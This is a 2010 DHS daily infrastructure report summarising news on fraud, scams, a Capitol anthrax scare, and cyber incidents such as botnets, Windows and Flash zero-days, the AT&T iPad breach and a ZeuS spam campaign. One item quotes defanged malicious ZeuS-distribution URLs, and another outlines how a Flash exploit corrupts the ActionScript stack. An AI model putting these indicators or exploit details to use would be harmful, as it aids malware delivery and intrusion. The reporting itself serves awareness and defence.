Department of Homeland Security Daily Open Source Infrastructure Report

Friday, June 11, 2010

Complete DHS Daily Report for June 11, 2010

Daily Report

Top Stories

• According to The Hill, Lawmakers June 9 expressed outrage that a supervisor with the Capitol Visitor Center (CVC) in Washington D.C. flushed a white powder from a plastic bag labeled “Anthrax” down a toilet at the Capitol while hundreds of tourists milled around nearby. (See item 33)

33. June 9, The Hill – (District of Columbia) Official flushes ‘anthrax’ down Capitol toilet with hundreds of tourists nearby. Lawmakers June 9 expressed outrage that a supervisor with the Capitol Visitor Center (CVC) in Washington D.C. flushed a white powder from a plastic bag labeled “Anthrax” down a toilet at the Capitol while hundreds of tourists milled around nearby. After being notified by a visitor assistant that the powder-filled bag was in the CVC’s Exhibition Hall, an operational supervisor allegedly retrieved a pair of plastic gloves and brought it to a nearby bathroom and flushed its contents down a toilet. About an hour later, Capitol Police were notified. The hazardous devices unit found no traces of harmful biological components, such as anthrax spores, during an inspection June 5 that covered the restroom, the route the supervisor allegedly took there and the area where the bag was found. The Hill is not naming the operational supervisor who flushed the substance because the identity of the employee has not been confirmed by an on-the-record source. Source: http://thehill.com/homenews/house/102213-guide-flushes-anthrax-down-capitol-toilet-with-tourists-nearby

• IDG News Service reports that Internet users have been hit by a widespread Web attack that has compromised thousands of Web sites, including Web pages belonging to the Wall Street Journal and the Jerusalem Post. Estimates of the total number of compromised Web sites vary between 7,000 and 114,000, according to security experts. (See item 43 below in the Information Technology Sector)

Details

Banking and Finance Sector

9. June 10, Wall Sreet Journal – (New York) FBI raids alleged boiler room. A suspected member of the Bonnano organized-crime family, and half a dozen others, were arrested in a dawn raid June 9, quickly followed by a search and seizure of an alleged “boiler room” operation in Manhattan’s Garment District. The main suspect, described by law-enforcement officials as a Bonnano soldier, was accused of masterminding an alleged 10-year investment scam that hoodwinked mostly elderly investors out of more than $12 million. In total, 13 people were indicted in the case. The main suspect and seven others arrested in New York June 9 pleaded not guilty at a hearing in Manhattan. One person was expected to appear in court in Pennsylvania, another was scheduled to appear in a Florida court, and two others were expected to surrender at a later date, law-enforcement officials said. One person remained at large. In a boiler-room scam, brokers typically use high-pressure sales tactics, usually by telephone, to induce potential clients to invest. According to the June 9 criminal indictment, the main suspect and his co-defendants allegedly pressured mostly elderly investors into buying shares in several companies — including a Florida online-broadcast provider called Realcast, which allegedly used the operation to solicit investors. At least 40 percent of the money from investors was allegedly used to pay “commissions” to members of the purported boiler room. Source: http://online.wsj.com/article/SB10001424052748703890904575297220025441524.html?mod=WSJ_hpp_sections_newyork


10. June 10, Courthouse News Service – (International) $11 million Latin American Ponzi alleged. Investors say a Latin American corporation took them for $11 million in a Ponzi scheme, and charged exorbitant commissions on futures trading along the way. The 18 plaintiffs claim that Alaron Trading Corp. charged them “$42 per round turn contract, almost three times the going rate, and shared the grossly inflated commission charges” with a Guatemalan company. The 18 individual and corporate plaintiffs sued Alaron Trading Corp. dba Alaron Latin America, and its organizers. According to the complaint in Chicago federal court, the suspects “regularly traveled to Guatemala and other Latin American countries to participate in marketing and promotion events to solicit and induce potential investors to open accounts.” The plaintiffs say the defendants shared their “grossly inflated commission(s)” with Mercados de Futuros (MDF), a Guatemalan company. They say they realized it was a scam when “the MDF offices were finally shut down as a result of a Guatemalan governmental criminal investigation.” Source: http://www.courthousenews.com/2010/06/10/27968.htm


11. June 9, The Register – (International) Malaysian cops bust SMS scam ring. Malaysian cops have busted an alleged text message spam scam ring thought to have fleeced locals for hundreds of thousands of dollars. The group - a Malaysian and 25 foreigners aged between 16 and 41 - are suspected of raking in RM6.4m ($1.9m) between 2006 and April 2010 using fictitious lottery winnings as a bait for an advanced-fee fraud, the Star Malaysia reports. The federal commercial crimes investigations department (CCID) boss told reporters at a press conference June 7 that the group is actually part of an even larger SMS scam syndicate busted last year in Malaysia’s Tawau province. Police are hunting for two suspects who escaped last week’s dragnet, during which police seized four laptops, 73 mobiles, 41 accounting ledgers, ATM and credit cards and RM6,000 ($1,800) in cash. Investigators reckon the laptops were used to distribute the SMS messages that formed the central part of the scam. Would-be marks were told they had won prizes from major corporations such as Petronas, Shell and Maxis. The messages said that victims needed to make payments into local bank accounts before they would be able to collect their supposed winnings, which never materialized. Bank accounts linked to the scam are under investigation. Source: http://www.theregister.co.uk/2010/06/09/malaysian_sms_scam_ring/


12. June 9, WDIV-TV 4 Detroit – (Michigan) ATM skimmer striking Washtenaw Co. Washtenaw County authorities are asking the public to be on the lookout for a man who is accused of trying to steal ATM card numbers. A Washtenaw County Sheriff’s Department spokesman said the man was caught on ATM surveillance cameras May 30 placing a skimming device on an ATM at a Bank of America branch on West Michigan Avenue in Ypsilanti Township. The spokesman said the device at the Bank of America was discovered and removed by bank employees before any losses were reported. Source: http://www.clickondetroit.com/news/23848220/detail.html


13. June 9, KDVR Denver – (Colorado) Police searching for ‘Perennial Bandit’ after bank robbery. Bank of the West at 2050 S. Downing St. in Denver was robbed on Wednesday afternoon by a man the FBI has dubbed the “Perennial Bandit.” The suspect, described as a white male with a blonde buzz cut in his early 20s standing 5 feet 9 inches and weighing approximately 175 lbs., presented a note to the teller demanding money. He is also believed to be responsible for another robbery of the same bank on June 11, 2009. His yearly pattern of blooming crime has lead law enforcement to dub him the “Perennial Bandit” as he only seems to pop up once per year. Source: http://www.kwgn.com/news/kdvr-fbi-looking-for-perennial-bandit-txt,0,5589480.story


14. June 9, Wayne Independent – (Pennsylvania) Honesdale police: Beware of bank scam. There is a scam reported in Honesdale, Pennsylvania using the name of a local bank. Honesdale Borough Police said they received numerous calls from people stating that they received a phone call regarding their debit or credit card at the Wayne Bank. The automated call states: “Your Wayne Bank card has been deactivated and press Option 1 for the Security Department,” according to Honesdale Police. The Honesdale Police would like to remind the public not to conduct any type of banking business via an automated phone call. People who receive such a call should simply hang up. Source: http://www.wayneindependent.com/news/x1932556076/Honesdale-Police-Beware-of-bank-scam

15. June 9, Chippewa Herald – (Wisconsin) Update: Three area law enforcement agencies warn of financial phone scam. Three Wisconsin-area law enforcement agencies are warning about a phone financial scam where an automated recording says the credit card of the person getting the call has been deactivated. The automated call instructs the person receiving the call to press #1 to enter information. “The caller I.D. for many of these phone calls shows the number 1-817-688-7853. If you attempt to contact this number, you will be advised that it is out of service,” Eau Claire Police said in a press release June 9. Chippewa Falls Police, the Chippewa County Sheriff’s Department, and Eau Claire Police are warning residents to be extremely wary of this scam. Each department said they received a high number of complaints about the scam June 9. Source: http://www.chippewa.com/news/local/article_151a2d3a-73e7-11df-9279-001cc4c03286.html


Information Technology


38. June 10, The New New Internet – (International) Botnet targeting Mexicans taken down by owner. A botnet that was being used to target Mexicans has been taken down, apparently by the cyber criminal who set it up, according to TrendMicro. “The botnet appears to have been taken down by the owners themselves,” wrote a senior threat researcher with TrendMicro. “The botnet’s controllers sent out new instructions to all of the active bots,” he wrote. “One of the effects of this was to stop all of the bots’ phishing attacks perhaps because our own post exposed all of the proxy servers and redirected hosts used in those attacks.” After taking down the so-called Tequila botnet, the cyber criminal(s) set up a second one, dubbed Mariachi botnet, which was also rapidly dismantled. “Both the Mariachi and Tequila botnets went offline after their command-and-control (C&C) servers were taken down. The Mariachi botnet’s C&C server appears to have been taken down by its hosting provider,Bluehost,” the researcher wrote. Source: http://www.thenewnewinternet.com/2010/06/10/botnet-targeting-mexicans-taken-down-by-owner/


39. June 10, SC Magazine – (International) New zero-day vulnerability in Microsoft Windows XP and 2003 discovered. Microsoft has warned of a new zero-day vulnerability for Windows XP/2003, just two days after its monthly Patch Tuesday. The vulnerability is in the Windows Help and Support Center component and is accessed through the protocol handler “hcp://.” A researcher who discovered and detailed the vulnerability claimed on his Twitter feed that “the risk is too high to keep this one quiet.” He said that upon successful exploitation, a remote attacker is able to execute arbitrary commands with the privileges of the current user. He said: “Some minor modifications will be required to target other configurations, this is simply an attempt to demonstrate the problem. I’m sure the smart guys at Metasploit will work on designing reliable attacks, as security professionals require these to do their jobs.” In terms of affected software, the researcher said: “At least Microsoft Windows XP and Windows Server 2003 are affected. The attack is enhanced against IE8 and other major browsers if Windows Media Player is available, but an installation is still vulnerable without it. Machines running version of IE less than 8 are, as usual, in even more trouble.” Source: http://www.scmagazineuk.com/new-zero-day-vulnerability-in-microsoft-windows-xp-and-2003-discovered/article/172078/


40. June 10, Help Net Security – (International) Drive-by download attack disguised by Canadian Pharmacy Web site. Red Condor issued a June 10 warning of a new, sophisticated e-mail malware threat that spoofs YouTube and uses a redirect on a compromised Web site to a common Canadian Pharmacy Web site to distribute malicious PDFs via drive-by download. The pharmacy page is actually a red herring that has distracted many security researchers from the true motive of these campaigns, a stealth drive-by download. With a single click, users can infect their computers. The malware, which as of the morning of June 9 had not been detected by any anti-virus engines, comes as a malicious PDF download. Red Condor has captured 10 versions of the malicious PDF, which likely exploits vulnerabilities in Adobe Acrobat. The campaign appears to be part of a much larger attack first detected by the company several weeks ago and has also recently spoofed Facebook and Twitter, among other popular brands. As unsuspecting users wait for what they believe is a YouTube or Twitter friend request, a greeting card, or even a Facebook log-in page to load, their browsers download and execute the malicious code, and then the Canadian Pharmacy page appears. “The amount of effort behind these new campaigns is not commensurate with the typical Canadian Pharmacy spam campaigns that we have seen in the past,” said the CEO of Red Condor. Source: http://www.net-security.org/malware_news.php?id=1372


41. June 10, The H Security – (International) Exploit for new Flash vulnerability spreading fast. According to a number of anti-virus software vendors, an exploit for the unpatched vulnerability in Adobe’s Flash Player and Reader is spreading rapidly and a number of Web sites are already spreading malware by exploiting the vulnerability. The vulnerability affects Flash Player 10.0.45.2 and earlier, and the authplay.dll library included with Reader and Acrobat 9.x. According to several independent analyses, the exploit is based on a Flash demo for implementing the AES encryption algorithm written in ActionScript. The exploit replaces just a single line (getproperty instead of newfunction), but this substitution makes a mess of the ActionScript stack. This apparently allows additional x86 code to be written to the PC’s memory via Flash Player’s just-in-time compiler and executed. A detailed analysis of the exploit can be found in “A brief analysis of a malicious PDF file which exploits this week’s Flash 0-day.” Crafted Web sites are already attempting to use the exploit to launch programs which download further malware from the Web, including back doors and Trojans. Adobe has announced that it is to release an update for Flash Player June 10. The update for Adobe Reader and Acrobat will be released July 29, two weeks prior to the regular quarterly patch day. Source: http://www.h-online.com/security/news/item/Exploit-for-new-Flash-vulnerability-spreading-fast-1019485.html


42. June 9, Washington Post – (International) AT&T: Security gap exposed Apple iPad e-mail addresses, IDs. AT&T said late June 9 that a security breach had exposed the e-mail addresses of Apple iPad users. The nation’s second-largest wireless service provider said that the problem had been fixed and that it would inform customers of the breach, which also exposed their iPad identification numbers used to authenticate a wireless user. Gawker reported that the information was obtained by a hacker group calling itself Goatse Security. The group used a script on AT&T’s Web site, accessible to anyone on the Internet, to get the data. The hacker group obtained the e-mail addresses of top-level politicians, television reporters and business executives, including the White House chief of staff. AT&T did not say how many customers were affected. But Gawker, which reported the breach June 9, said 114,000 e-mail addresses were exposed. Apple, which says it has sold 2 million iPads since it was launched last April, did not immediately respond to an interview request. “The issue has escalated to the highest levels of the company and was corrected by [June 8]; and we have essentially turned off the feature that provided the e-mail addresses,” AT&T said in a statement. Source: http://voices.washingtonpost.com/posttech/2010/06/att_says_security_hole_exposed.html?hpid=topnews


43. June 9, IDG News Service – (International) Mass Web attack hits Wall Street Journal, Jerusalem Post. Internet users have been hit by a widespread Web attack that has compromised thousands of Web sites, including Web pages belonging to the Wall Street Journal and the Jerusalem Post. Estimates of the total number of compromised Web sites vary between 7,000 and 114,000, according to security experts. Other compromised sites include Servicewomen.org and Intljobs.org. Cisco Systems’ Web-tracking subsidiary, ScanSafe, started following the incident two days ago, said a senior security researcher with Cisco. Somehow, the hackers have posted malicious HTML code on the affected Web sites that redirects victims to a malicious Web server. This server tries to install software on Web visitors’ computers. If it is successful, the software gives the criminals a way to remotely control their victims’ PCs. Security researchers are still gathering data on the attacks, but they suspect that hackers used an SQL injection attack to trick the Web sites into running database commands, which ultimately gave the hackers a way of installing their malicious HTML. All of the infected sites appear to be using the Microsoft Internet Information Services Web-server software running with Active Server Pages, according to researchers at Sucuri Security. Source: http://www.computerworld.com/s/article/9177904/Mass_Web_attack_hits_Wall_Street_Journal_Jerusalem_Post


44. June 9, Krebs on Security – (National) ZeuS trojan attack spoofs IRS, Twitter, Youtube. Criminals have launched an major e-mail campaign to deploy the infamous ZeuS Trojan, blasting out spam messages variously disguised as fraud alerts from the Internal Revenue Service, Twitter account hijack warnings, and salacious Youtube.com videos. According to the director of research in computer forensics at the University of Alabama, Birmingham, this latest attack appears to be an extension of a broad malware spam campaign that began at the end of May. The fake IRS e-mails arrive with the tried-and-true subject line “Notice of Underreported Income,” and encourage the recipient to click a link to review their tax statement. All of the latest e-mails use a variety of URL shortening services. For example, this shortened link (currently live and dangerous, and therefore neutered here)⦠hxxp://qurl.com/zv9j7 â¦.when clicked reverts to: hxxp://qqq.irs.gov.vrddr.ru/fraud_application/directory/statement.php?tid=00000143073750US â¦.which takes the user to one of dozens of identical Web pages that spoof the IRS and encourage visitors to download and review their tax statement, which is of course a powerful and stealthy password-stealing program. The director said anti-virus detection for this malware is extremely low: Only three out of 40 different anti-virus products detected the file as malicious, yet none of those currently identify it for what it is: Another new version of the ZeuS Trojan. Source: http://krebsonsecurity.com/2010/06/zeus-trojan-attack-spoofs-irs-twitter-youtube/


Communications Sector

45. June 9, IDG News Service – (National) USDA details first round of broadband funding. A first round of funding for broadband projects from the U.S. Department of Agriculture’s Rural Utilities Service will bring broadband availability to nearly 530,000 households and 93,000 businesses, the USDA said June 9. The first round of broadband funding, made available through the huge economic stimulus bill, the American Recovery and Reinvestment Act (ARRA), will create about 5,000 new jobs, the USDA Secretary said during a press conference. New jobs would include workers to build broadband networks and lay fiber, and Internet service provider positions after the networks are in place, he said. In the first round of funding, the USDA awarded $1.07 billion to 68 projects in 31 states and one U.S. territory, he said. In addition to households and businesses, the funding will bring broadband to more than 3,000 schools, hospitals and other community anchor institutions, he said. About 14 million U.S. residents lack access to broadband. The USDA’s goal in its two rounds of broadband grants and loans is to reach 1.2 million households, 230,000 businesses and close to 8,000 anchor institutions. The broadband investments will help farmers and ranchers have real-time information on weather and prices, help schools offer new courses through distance learning, help rural hospitals offer new services through telemedicine, and help rural businesses gain access to a global market. Source: http://www.computerworld.com/s/article/9177900/USDA_details_first_round_of_broadband_funding


46. June 9, IDG News Service – (National) Tech companies form group to study net neutrality. A group of technology and telecom companies has launched a new broadband technical advisory committee that will look into ways to resolve net neutrality issues and other network-management challenges. The new committee, called the Broadband Internet Technical Advisory Group, or TAG, will attempt to bring together engineers and other technical experts to develop consensus on broadband network-management practices and related issues, TAG said in a press release. TAG will focus on educating U.S. policymakers on technical issues and on addressing technical issues in an effort to minimize policy disputes, the group said. The group will try to inform federal agencies, including the Federal Communications Commission (FCC), the Federal Trade Commission, and the U.S. Department of Justice, about the technical issues surrounding network management, the group said in a press release. A professor of the University of Colorado will serve as facilitator for TAG. He is a former chief technologist at the FCC who now serves as executive director of the Silicon Flatirons Center, a technology and law policy center at the University of Colorado. Among the companies participating in forming TAG are AT&T, Cisco Systems, Comcast, DISH Network, EchoStar, Google, Intel, Level 3 Communications, Microsoft, Time Warner Cable, and Verizon Communications. Source: http://www.computerworld.com/s/article/9177902/Tech_companies_form_group_to_study_net_neutrality_